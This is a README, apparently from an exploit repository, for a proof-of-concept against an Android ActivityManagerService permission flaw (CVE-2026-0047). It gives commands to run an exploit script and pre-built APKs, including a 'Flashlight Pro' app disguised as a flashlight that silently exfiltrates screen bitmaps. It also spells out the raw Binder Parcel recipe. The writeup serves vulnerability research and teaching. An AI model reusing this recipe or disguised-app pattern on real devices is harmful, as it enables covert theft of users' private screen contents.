## https://sploitus.com/exploit?id=C3E9251E-4FF9-59FD-AE92-266794E6812A
# CVE-2026-0047: Missing Permission Check in ActivityManagerService
**Heap of bitmaps stolen from every running app โ zero permissions, zero user interaction.**
A missing `enforceCallingOrSelfPermission(DUMP)` check in `ActivityManagerService.dumpBitmapsProto()` allows any installed app to exfiltrate UI bitmaps from all running processes on Android 16 QPR2 Beta (Baklava).
> **Note:** We did not discover this vulnerability. All credit for finding and responsibly reporting goes to the original researchers. This repository contains our independent **patch analysis, reproduction, and educational writeup** to help the security community understand the bug class and exploitation techniques involved.
| | |
|---|---|
| **CVE** | CVE-2026-0047 |
| **Severity** | Critical โ CVSS 8.4 |
| **Component** | `ActivityManagerService.dumpBitmapsProto()` |
| **Root Cause** | Missing permission check (CWE-280) |
| **Impact** | Any zero-permission app steals UI bitmaps from all running apps |
| **Affected** | Android 16 QPR2 Beta 1โ3 (Baklava), patch level < 2026-03-01 |
| **Patched** | [March 2026 Android Security Bulletin](https://source.android.com/docs/security/bulletin/2026/2026-03-01) |
## Repository Contents
```
โโโ app/ # PoC exploit app (audit tool UI)
โโโ attacker/ # "Flashlight Pro" โ disguised attacker app
โโโ apk/ # Pre-built APKs (ready to install)
โ โโโ cve-2026-0047-poc.apk
โ โโโ flashlight-pro-attacker.apk
โโโ exploit.sh # Single-shot exploit script
โโโ gradle/ # Gradle wrapper
โโโ README.md
```
## Setting Up the Test Environment
You need an Android 16 QPR2 Beta (Baklava) emulator with a security patch level before `2026-03-01`:
```bash
# Download the vulnerable system image
sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"
# Create an AVD
avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"
# Boot the emulator
emulator -avd baklava &
# Verify the patch level is pre-fix
adb shell getprop ro.build.version.security_patch
# Anything before 2026-03-01 is vulnerable
```
## Quick Start
### Option 1: Single-shot script (recommended)
```bash
# Full run: set up emulator, build, exploit, extract stolen bitmaps
./exploit.sh --setup-emulator
# Already have a Baklava emulator running?
./exploit.sh
# Skip build, just run exploit
./exploit.sh --skip-build
```
### Option 2: Pre-built APK
```bash
# Install the PoC app
adb install apk/cve-2026-0047-poc.apk
# Open some apps (Settings, email, etc.) to have visible UI
adb shell am start -n com.android.settings/.Settings
# Launch the PoC
adb shell am start -n com.poc.cve20260047/.MainActivity
# Tap "Exploit dumpBitmapsProto()" button
```
### Option 3: Attacker simulation ("Flashlight Pro")
```bash
# Install the disguised attacker app โ declares ZERO permissions
adb install apk/flashlight-pro-attacker.apk
# Launch it โ exfiltration happens silently on startup
adb shell am start -n com.poc.cve20260047.attacker/.MainActivity
```
## How It Works
1. **Raw Binder probe** โ Transaction code `#117` on the `activity` service maps to `dumpBitmapsProto()`. Sending it without arguments causes a `NullPointerException` inside AMS (not a `SecurityException`), proving the method body executes without any permission check.
2. **Raw Binder exploit** โ We use `IBinder.transact()` to send a hand-crafted Parcel directly to AMS. This bypasses Android's hidden API restrictions entirely โ no `hidden_api_policy` setting needed. The Parcel contains:
- Interface token (`android.app.IActivityManager`)
- Non-null marker + `ParcelFileDescriptor` (pipe write end)
- Empty string array (all processes)
- `userId = -2` (`USER_CURRENT`)
- `dumpAll = true`
- `format = "png"`
3. **Bitmap extraction** โ AMS writes protobuf data containing PNG bitmaps to the pipe. We scan for PNG magic bytes (`89 50 4E 47`) and IEND trailers to extract individual images.
### Result
On a Baklava emulator (`BP41.250725.007`, patch `2025-08-05`) with Settings, Clock, and Files open:
- **679,091 bytes** of protobuf data
- **63 valid PNG images** stolen from all running apps
- **Zero permissions** declared by the PoC app
## How It Was Fixed
Google added `enforceCallingOrSelfPermission(DUMP)` as the first line of `dumpBitmapsProto()`, so unprivileged callers now get a `SecurityException` before any data is accessed.
## References
- [Android Security Bulletin โ March 2026](https://source.android.com/docs/security/bulletin/2026/2026-03-01)
- [CVE-2026-0047 โ NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-0047)
- [CWE-280: Improper Handling of Insufficient Permissions](https://cwe.mitre.org/data/definitions/280.html)
- [Blog post: Full analysis and exploitation walkthrough](https://www.mobilehackingcourse.com/cve-2026-0047-activitymanager-eop/)
## Credits
Research and PoC by [Mobile Hacking Lab](https://www.mobilehackinglab.com). We reproduced this vulnerability independently for educational purposes.
## Disclaimer
This proof of concept is provided for **educational and authorized security research purposes only**. Only use it on devices and environments you own or have explicit permission to test. The authors are not responsible for any misuse.